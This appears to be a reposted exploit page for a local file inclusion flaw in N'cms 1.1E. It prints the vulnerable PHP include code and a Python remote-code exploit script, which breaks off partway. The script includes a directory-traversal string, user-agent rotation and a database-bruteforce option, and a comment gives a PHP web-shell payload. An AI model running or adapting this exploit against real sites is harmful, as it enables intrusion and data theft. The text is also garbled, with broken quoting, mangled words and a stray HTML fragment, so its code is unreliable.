N'cms 1.1E local File Inclusion Vulnerability and repair

N'cms is a content management system. n' CMS has a local file inclusion vulnerability, which may cause sensitive information leakage.

[+] Info:
~~~~~~~~~
N'cms 1.1E Pre-Auth Local File transfer sion Remote Code Exploit

[+] Poc:
~~~~~~~~~
 

#!/usr/bin/python  

# ~INFORMATION  

# Exploit Title:    N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit  

# Date:         11/3/2011  

# Software link:    http://bit.ly/eJAyw5  

# Tested on:        Linux bt  

# Version:      1.1E  

# PHP.ini Settings: gpc_magic_quotes = Off  

   

# Note: The web application was lucky to not be exploited by session   

# injection with a malicious username example <?php system($_GET[cmd])>   

# as htmlentities() encoded the bracket :-)  

   

# ~VULNERABLE CODE  

  

<?php  

if( isset( $_GET[page] ) )  

{  

    if( file_exists( page/.$_GET[page]..php ) )  

    {  

        include( page/.$_GET[page]..php );  

    }  

    else  

    {  

        include( page/404.php );  

    }  

}  

else  

{  

    include( page/home.php );  

}  

?>  

 

import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass  

from optparse import OptionParser  

from urlparse import urlparse,urljoin  

from urllib import urlopen  

from cookielib import CookieJar  

   

__CONTACT__ ="TecR0c(tecr0c@tecninja.net)" 

__DATE__ ="11.3.2011" 

   

usage = Example : %s http://localhost/ncms/ -c user:pass -w databases.txt 

-p 127.0.0.1:8080 % __file__  

parser = OptionParser(usage=usage)  

parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",  

        help="HTTP Proxy <server>:<port>")  

parser.add_option("-w","--wordlist", type="string",action="store",

 dest="wordlist",  

        help="file to use to bruteforce database")  

parser.add_option("-c","--credentials", type="string",action="store", 

dest="credentials",default="hacker:ph33r",  

        help="credentials for login, " 

    "or [default: %default]")  

   

(options, args) = parser.parse_args()  

   

if options.proxy:  

    print [+] Using Proxy+options.proxy  

   

# User Agents  

agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",  

        "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",  

        "Google Chrome 0.2.149.29 (Windows XP)",  

        "Opera 9.25 (Windows Vista)",  

        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",  

        "Opera/8.00 (Windows NT 5.1; U; en)"]  

agent = random.choice(agents)  

   

traversal = ./../../../../../../../.. 

   

def banner():  

    if os.name == "posix":  

        os.system("clear")  

    else:  

        os.system("cls")  

    header =   

|----------------------------------------|  

|Exploit: NCMS LFI RCE  

|Author: %s  

|Date: %s  

|----------------------------------------|  

%(__CONTACT__,__DATE__)  

    for i in header:  

        print "%s"%i,  

        sys.stdout.flush()  

        time.sleep(0.005)  

   

def proxyCheck():  

        if options.proxy:  

                try:  

                        h2 = httplib.HTTPConnection(options.proxy)  

                        h2.connect()  

                        print "[+] Using Proxy Server:",options.proxy  

                except(socket.timeout):  

                        print "[-] Proxy Timed Out" 

                        pass 

                        sys.exit(1)  

                except(NameError):  

                        print "[-] Proxy Not Given" 

                        pass 

                        sys.exit(1)  

                except:  

                        print "[-] Proxy Failed" 

                        pass 

                        sys.exit(1)  

   

def getProxy():  

        try:  

                proxy_handler = urllib2.ProxyHandler({http: options.proxy})  

        except(socket.timeout):  

    &nbs